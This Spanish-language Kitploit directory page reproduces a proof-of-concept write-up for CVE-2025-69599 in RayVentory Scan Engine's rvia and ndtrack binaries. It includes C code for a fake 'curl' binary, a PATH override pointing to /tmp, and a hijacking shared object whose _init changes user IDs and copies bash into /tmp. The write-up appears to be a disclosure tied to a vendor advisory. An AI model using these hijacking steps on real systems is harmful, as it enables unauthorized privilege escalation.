Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-69599 — Exploit de prueba de concepto para CVE-2025-69599 que demuestra un elemento de ruta de búsqueda no controlada en RayVentory Scan Engine mediante secuestro de PATH e inyección de objetos compartidos para escalada de privilegios. | Kitploit
Herramientas/GitHubGitHub/wise-security/cve-2025-69599
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAnálisis de BinariosSeguridad de Cadena de Suministro
GitHubwise-security/cve-2025-69599

CVE-2025-69599

Exploit de prueba de concepto para CVE-2025-69599 que demuestra un elemento de ruta de búsqueda no controlada en RayVentory Scan Engine mediante secuestro de PATH e inyección de objetos compartidos para escalada de privilegios.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 4 mesesAún no revisado

CVE-2025-69599

  • autor: Rafael José Núñez Gulías
  • empresa: Iberian Var Group
  • Productos afectados: RayVentory Scan Engine 12.6 Update 8 y versiones anteriores
  • Aviso de Raynet: RSEC200965

rvia en Raynet es vulnerable a un problema de Elemento de Ruta de Búsqueda No Controlada. Al cargar objetos compartidos y llamar a binarios del sistema (como .so, y binarios auxiliares), se llaman usando rutas relativas, lo que permite a un usuario manipular el binario final o el objeto .so ejecutado mediante la manipulación de la variable de entorno PATH.

20251117223200.png

En la siguiente evidencia, se crea un binario arbitrario llamado curl en el directorio /tmp.

root@kitploit:~
#include <stdio.h>
#include <stdlib.h>

int main() {
	system("whoami");
	return 0;
}
root@kitploit:~
gcc curl.c -o curl # Compiling the binary

La variable PATH se modifica para que el primer directorio en buscar el comando curl cuando sea llamado por rvia sea /tmp.

root@kitploit:~
export PATH=/tmp:$PATH

Y después de eso, una llamada a /opt/rvia/rvia getconfig usará nuestro binario curl manipulado.

20251209121335.png

Lo mismo aplica para la opción upload.

20251209121709.png

El mismo problema se encuentra al usar la opción rvia inventory, que internamente llama al binario ndtrack. El binario ndtrack llama a los comandos cat y sh usando una ruta relativa.

20251117223833.png

20251224134109.png

Finalmente, también se detectó que el binario ndtrack incluye objetos compartidos (archivos .so), usando rutas relativas.

20251118093146.png

En la siguiente evidencia es posible ver los pasos tomados para reemplazar la llamada relativa a libnetselector.so (también es posible realizar las mismas acciones con libuploader.so). En este caso se crea un objeto compartido personalizado; cuando este objeto compartido se ejecuta, se va a crear una copia de bash en el directorio /tmp como bash_so_hijack.

El siguiente es el código C para crear el objeto compartido personalizado llamado libnetselector.so

root@kitploit:~
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>

void _init() {
	setuid(1001);
	setgid(1001);
	system("cp /bin/bash /tmp/bash_so_hijack");
}
root@kitploit:~
gcc -fPIC -shared -o libnetselector.so libnetselector.c -nostartfiles # compiling the shared object

20251209131403.png

Es importante notar que esto solo funciona cuando se llama a ndtrack directamente, ya que cuando se invoca la opción inventory, se realiza una llamada a un script bash en /opt/rvia llamado ndtrack, que establece la variable de entorno PATH antes de llamar al binario ndtrack.

20251223190146.png

Descargar herramienta